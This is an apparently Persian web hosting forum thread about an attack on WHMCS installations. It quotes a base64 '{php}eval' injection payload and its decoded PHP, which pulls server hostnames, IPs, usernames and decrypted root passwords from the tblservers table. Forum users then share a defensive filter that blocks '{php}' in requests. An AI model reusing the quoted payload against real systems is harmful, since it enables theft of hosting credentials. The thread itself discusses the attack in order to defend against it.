{php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1c mF0aW9uLnBocCcpOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSg iU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQokdGV4dD0kd GV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9 TVCBST09UUyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcc lxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF 1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzc yddOw0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHl wZSA9ICR2Wyd0eXBlJ107DQokYWN0aXZlID0gJHZbJ2FjdGl2Z SddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQoNCg0 KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sI CRjY19lbmNyeXB0aW9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4 iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9JHRleHQuIkFjdGl2Z SAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWU gJGhvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwY WRkcmVzc1xyXG4iOw0KJHRleHQ9JHRleHQuIlVzZXJuYW1lICR 1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc3N3b3JkI CRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKio qKioqKioqKioqKioqKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0Z Xh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBIT1N UIFJPT1RTICMjIyMjIyMjIyM

که بعد از کد گشای تقریبا یه همچین چیزی میشه

zm^r^
include('configuration.php');

$query = mysql_query("SELECT * FROM tblservers");
$text=$text."\r\n######################### HOST ROOTS ###########################\r\n";
while($v = mysql_fetch_array($query)) {

$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];


$password = decrypt ($v['password'], $cc_encryption_hash);

$text=$text."Type $type\r\n";
$text=$text."Active $active\r\n";
$text=$text."Hostname $hostname\r\n";
$text=$text."Ip $ipaddress\r\n";
$text=$text."Username $username\r\n";
$text=$text."Password $password\r\n************************************* *\r\n";


}
$text=$text."\r\n######################### HOST ROOTS ##########

اگه به کدش توجه کنید با شامل کردن فایل کانفیگ از تیبل سرور میخواد یوزر و پسورد هاست ها رو به دست بیاره

همون طوری که در این سایت هم خواندید با بلوک کردن php و آپدیت به آخرین ورژن میشه جلوی این جور ایمیل ها رو گرفت .
جالب این جاست که هم وطنان خودمون میان این کارها رو انجام میدن .
با تشکر از مدیریت وب هاستینگ تالک . مرادپور

بعد از اینکه تمام مراحل امنیتی رو اکی کردید
داخل فایل کانفیگ این کدو بذارید

نقل قول:

---

foreach ($_REQUEST as $value)
{
if(strpos(strtolower($value), "{php}") !== false)
die("Hacking Attempt !");
}

---

جای Hacking Attempt هر دردو دلی با اون هکر .... داشتی میتونی بنویسی

بله با توجه به روش دوست گلمون Ashkankamangar.ir بايد در نظر داشت كه whmcs خودش جايي براي اين كد نويسي ها در نظر گرفته است:39:
با يك كد نويسي ساده از دست اين اسپام ها خلاص شديم علاوه بر اين امنيت قسمت هاي ديگه هم را در كنترل گرفتيم و حالا هر كس اقدام كنه بي برو برگرد بن ميشه #-o
با توجه به اين كه جوجه هكرا جز اسپام مزاحمت ديگه اي نداشتن و معمولا با ويـ بيـ انـ وصل ميشن با بن شدن دسشون بد جوري كوتا ميشه و :61:

اگر کدی بهتر سراغ دارید بذارید ولی کلا به نظرم با این موارد مشکل تغریبا حل بشه

نقل قول:

---

نوشته اصلی توسط Ashkankamangar.ir

بعد از اینکه تمام مراحل امنیتی رو اکی کردید
داخل فایل کانفیگ این کدو بذارید


جای Hacking Attempt هر دردو دلی با اون هکر .... داشتی میتونی بنویسی

---

دقیقا این کد چکار میکنه ؟؟؟؟؟؟؟؟؟؟؟؟؟

وای من که میترسم ادیت کنم بهم میریزه